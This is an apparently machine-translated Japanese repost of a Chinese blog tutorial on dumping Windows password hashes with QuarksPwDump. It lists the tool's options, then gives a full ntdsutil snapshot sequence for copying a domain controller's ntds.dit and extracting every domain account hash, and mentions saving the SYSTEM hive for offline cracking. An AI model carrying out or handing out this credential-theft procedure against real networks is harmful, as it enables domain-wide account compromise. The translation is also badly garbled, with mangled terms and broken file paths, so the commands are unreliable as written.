ウェブ

攻撃と防御-QuarksPwDumpを使用してドメイン制御パスワードを取得します



Attack Defense Use Quarks Pwdump Get Domain Control Passwords



antian365.comsimeonによる

クォークPwDumpはいquarkslabユーザーパスワード抽出オープンソースツールを作成しました。現在のソフトウェアの最新バージョンは0.2b、その完全なソースコードはhttps://github.com/quarkslab/quarkspwdump取得、現在サポートしていますWindows XP / 2003 / Vista / 7/2008バージョン、および非常に安定しています。つかむことができますウィンドウズプラットフォームでの複数の種類のユーザー資格情報(ローカルアカウント、ドメインアカウント、キャッシュされたドメインアカウント、Bitlocker。著者がこのツールを開発した理由は、現在、すべてのタイプを同時に取得できるツールがないためです。ハッシュBitlocker情報。



ツールのソースコードのダウンロードアドレス:https://codeload.github.com/quarkslab/quarkspwdump/zip/master

現在、エクスポートできます



-ローカルアカウントNT / LMハッシュ+履歴地元NT / LMハッシュ+過去のログイン記録

-ドメインアカウントNT / LMハッシュ+履歴ドメイン内NT / LMハッシュ+過去のログイン記録

-キャッシュされたドメインパスワードキャッシュ内のドメイン管理パスワード



-Bitlocker回復情報(回復パスワードとキーパッケージ)使用するBitlocker復旧後に残された情報。

1.1。使用するクォークPwDumpローカルアカウントのハッシュ値

クォークPwDumpお奨めコマンドプロンプトで実行し、直接実行しますQuarksPwDumpv0.2b.exe示されているように1示されているように、ヘルプ情報はデフォルトで表示され、そのパラメーターには次の意味があります。

-dhlローカルハッシュ値をエクスポートする

-dhdcドメイン制御されたハッシュ値をメモリにエクスポートする

-dhdドメイン制御ハッシュ値をエクスポートします。指定する必要がありますNTDSファイル

-pcs書き出すBitlocker情報を指定する必要がありますNTDSファイル

-例えば書き出す顧みられない熱帯病ファイル

-歴史履歴情報のエクスポート、オプション

-tエクスポートタイプオプションのデフォルトのエクスポート先ジョンの種類。

-またはファイルをローカルにエクスポートする

wKiom1bMEcqBKOoZAAKJAwo7QZk706.jpg

1使用するクォークPwDumpローカルアカウントのハッシュ値

二。使用するクォークPwDumpアカウントインスタンスをエクスポートします

コマンドを使用する 'QuarksPwDumpv0.2b.exe -dhl -o1.txtローカルハッシュを現在のディレクトリにエクスポートします1.txt図に示すように、コマンドを実行して、エクスポートされたアカウントの数を表示します。示されています。そこに表示3アカウントをにエクスポートする1.txt、オンにする1.txtハッシュ値をエクスポートするための特定のアカウントと値を確認できます。

wKiom1bMEdqRlJsAAAIZA9S2qZo275.jpg

ローカルアカウントをファイルにエクスポート

3.3。協力するntdsutilツールドメイン制御パスワードのエクスポート

Ntdsutil.exeのためのものですActive Directory施設を管理するためのコマンドラインツールを提供します。使えるNtdsutil.exe実施したActive Directoryデータベースの保守、個々のホスト操作の管理と制御、アプリケーションディレクトリパーティションの作成、および未使用による削除Active Directoryインストールガイド(DCPromo.exe)正常に劣化したドメインコントローラーによって残されたメタデータ。Ntdsutilドメイン制御データベースの取得にも使用できますntds.ditファイル、具体的な順序は次のとおりです。

((1)スナップショットを作成する

ntdsutilスナップショット 'インスタンスをアクティブ化ntds'作成終了終了

(()。NtdsutilActiveDirectoryのスナップショットをマウントする

ntdsutilスナップショット 'mount {GUID}' quit quit

{GUID}示されているように、動的取得の場合3示されています。

((3)スナップショットのローカルディスクをコピーします

MOUNT_POINT windows NTDS ntds.dit c: ntds.ditをコピーします

((4)スナップショットをアンマウントします

ntdsutilスナップショット 'unmount {GUID}' quit quit

((5)スナップショットを削除します

ntdsutilスナップショット 'delete {GUID}' quit quit

wKioL1bMElawYN2WAAA_N5x0664225.png

3スナップショットファイルのエクスポート

コマンドを使用する 'QuarksPwDump.exe --dump-hash-domain--ntds-file c: ntds.ditエクスポートされますntds.ditファイル内のハッシュ値は完全にエクスポートされます。完全な例は次のとおりです。

tdsutilスナップショット 'インスタンスntdsをアクティブ化'作成終了終了

ntdsutilスナップショット 'mount {a0455f6c-40c3-4b56-80a0-80261471522c}' quit quit

スナップショット{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}としてマウント100: $ SNAP_201212082315_VOLUM

EC $

コピーC: $ SNAP_201212082315_VOLUMEC $ windows NTDS ntds.dit c: ntds.dit

ntdsutilスナップショット 'unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}' quit quit

ntdsutilスナップショット 'delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}' quit quit

QuarksPwDump.exe --dump-hash-domain --ntds-filec: ntds.dit

説明:同じサーバーでハッシュ値を取得するのが最善です。QuarksPwDump.exe直接輸出するntds.ditサーバーで、exportコマンドを実行します。するだけならntds.ditコピー後にローカルにダウンロードすると、読み取り不能エラーが発生する場合があります。インターネット上に1つあります。NTDS.ditパスワードクイック抽出ツール ntdsdump 読者は自分でそれをテストすることができます。ダウンロードしたい場合ntds.ditローカルリカバリにも実行する必要があります」reg save hklm system system.hive'、意志system.hiventds.ditドメイン制御パスワードを取得するには、すべてをローカルにコピーします。

参考資料

1.クォークPwDumphttp://blog.quarkslab.com/quarks-pwdump.html

NTDS.ditパスワードクイック抽出ツール、http://www.secpulse.com/archives/6301.html



この記事は、元のリンクであるsimeon2005 51CTOブログから転送されています:http://blog.51cto.com/simeon/1744314